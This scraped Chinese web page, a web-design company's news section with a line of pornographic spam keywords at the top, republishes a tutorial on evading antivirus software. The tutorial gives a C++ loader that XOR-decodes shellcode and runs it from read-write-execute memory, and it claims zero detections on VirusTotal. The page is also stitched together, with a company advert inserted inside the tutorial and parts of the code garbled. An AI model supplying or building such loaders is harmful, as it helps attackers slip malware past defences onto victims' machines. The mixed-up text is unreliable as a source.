日本综合一区二区|亚洲中文天堂综合|日韩欧美自拍一区|男女精品天堂一区|欧美自拍第6页亚洲成人精品一区|亚洲黄色天堂一区二区成人|超碰91偷拍第一页|日韩av夜夜嗨中文字幕|久久蜜综合视频官网|精美人妻一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時(shí)間:8:30-17:00
你可能遇到了下面的問(wèn)題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營(yíng)銷解決方案
如何利用十行代碼,繞過(guò)殺毒軟件實(shí)現(xiàn)免殺?

我原本打算寫一篇冗長(zhǎng)的博客講述針對(duì)不同殺毒軟件的繞過(guò)技術(shù),但當(dāng)我開(kāi)始著手寫教程的***章并上傳樣本到 virustotal 后,我震驚了!樣本得到了 0/56 的檢測(cè)率。于是我決定扔掉先前的長(zhǎng)篇大論,轉(zhuǎn)而記錄這個(gè)快速、令人難以置信的簡(jiǎn)單方法。

在蛟河等地區(qū),都構(gòu)建了全面的區(qū)域性戰(zhàn)略布局,加強(qiáng)發(fā)展的系統(tǒng)性、市場(chǎng)前瞻性、產(chǎn)品創(chuàng)新能力,以專注、極致的服務(wù)理念,為客戶提供網(wǎng)站制作、網(wǎng)站建設(shè) 網(wǎng)站設(shè)計(jì)制作按需求定制設(shè)計(jì),公司網(wǎng)站建設(shè),企業(yè)網(wǎng)站建設(shè),品牌網(wǎng)站建設(shè),成都全網(wǎng)營(yíng)銷,成都外貿(mào)網(wǎng)站建設(shè),蛟河網(wǎng)站建設(shè)費(fèi)用合理。

我相信大部分的讀者都會(huì)同意這個(gè)觀點(diǎn),繞過(guò)大部分殺毒軟件的基本方法都很平常沒(méi)什么特殊的。然而,我也偶爾會(huì)遇到一些人僅僅依靠工具生成二進(jìn)制文件,這些文件很容易被殺毒軟件通過(guò)指紋標(biāo)記出來(lái)。本文主要是為這些人所準(zhǔn)備的。

在我們開(kāi)始接觸這段小巧的 C++ 代碼前,我想先介紹一個(gè)可以非常棒的制造免殺的工具 Veil-Evasion (Veil-Framework的一部分)。這個(gè)工具非常神奇 (感謝 @harmj0y和他的小伙伴們創(chuàng)建了這個(gè)神奇的項(xiàng)目),在幾乎所有情況下,它都沒(méi)有讓我失望過(guò)。如果有,那我就要批評(píng)那些總是不停生成二進(jìn)制文件然后上傳到 virustotal 進(jìn)行測(cè)試的人。如果你不這么做,那就會(huì)更加美好了。

無(wú)論如何,這就引出了一個(gè)問(wèn)題,既然像 Veil-Evasion 這類的工具這么神奇,那為什么你要關(guān)心如何自己在二進(jìn)制文件加入 shellcode?原因有很多:

大牛都很忙而且工具有些過(guò)時(shí)。

工具生成的二進(jìn)制都擁有相似的指紋,不是指 payload,而是說(shuō)工具編譯二進(jìn)制的結(jié)構(gòu)有相似的指紋。

作為一個(gè)滲透測(cè)試工作者,你應(yīng)當(dāng)知道如何做。

在你看下面的代碼前,你應(yīng)該注意到這是針對(duì) Windows 平臺(tái)的,很明顯代碼中有 windows.h 的引用。

 
 
 
 
    
  
  
  
  
  1. #include 
    2. 
  
  
  
  
  2. #include 
    3. 
  
  
  
  
  3. int main(int argc, char **argv) {
    4. 
  
  
  
  
  4.  char b[] = {/* 插入你經(jīng)過(guò)與'x'異或操作后的shellcode代碼,例如:0x4C,0x4F, 0x4C */};
    5. 
  
  
  
  
  5.  char c[sizeof b];
    6. 
  
  
  
  
  6.  for (int i = 0; i < sizeof b; i++) {c[i] = b[i] ^ 'x';}
    7. 
  
  
  
  
  7.  void *exec = VirtualAlloc(0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    8. 
  
  
  
  
  8.  memcpy(exec, c, sizeof c);
    9. 
  
  
  
  
  9.  ((void(*)())exec)();
    10. 
  
  
  
  
  10. }
    11.

很簡(jiǎn)單,上面的代碼創(chuàng)建了一個(gè)可以自行添加包含 shellcode 的字符數(shù)組,關(guān)鍵點(diǎn)在于將你的 shellcode 與小寫字母 ‘x’ 執(zhí)行異或操作,然后分配一些內(nèi)存,拷貝字符數(shù)組到分配的內(nèi)存中,***執(zhí)行它。需要特別注意的是,你要先將 shellcode 與你選擇的關(guān)鍵字(本例中為 ‘x’)進(jìn)行異或操作,然后將 shellcode 放入到上面代碼中并編譯。

這時(shí)你可能會(huì)問(wèn)“就這樣?”。我了解你的感受,因?yàn)楫?dāng)時(shí)我也是這么想的,在寫完***章內(nèi)容并上傳樣本到 virustotal 后并收到 0/56 的檢測(cè)率。我想強(qiáng)調(diào)這是一個(gè)令人難以置信的簡(jiǎn)單和基礎(chǔ)的技術(shù),但它成功率卻出奇的高。

你生成二進(jìn)制文件的 SHA256 值可能跟我樣本的不太一樣,我樣本中包含的 shellcode 是由 metasploit framework 生成的。


當(dāng)前文章:如何利用十行代碼,繞過(guò)殺毒軟件實(shí)現(xiàn)免殺?
文章路徑:http://www.dlmjj.cn/article/ccecggo.html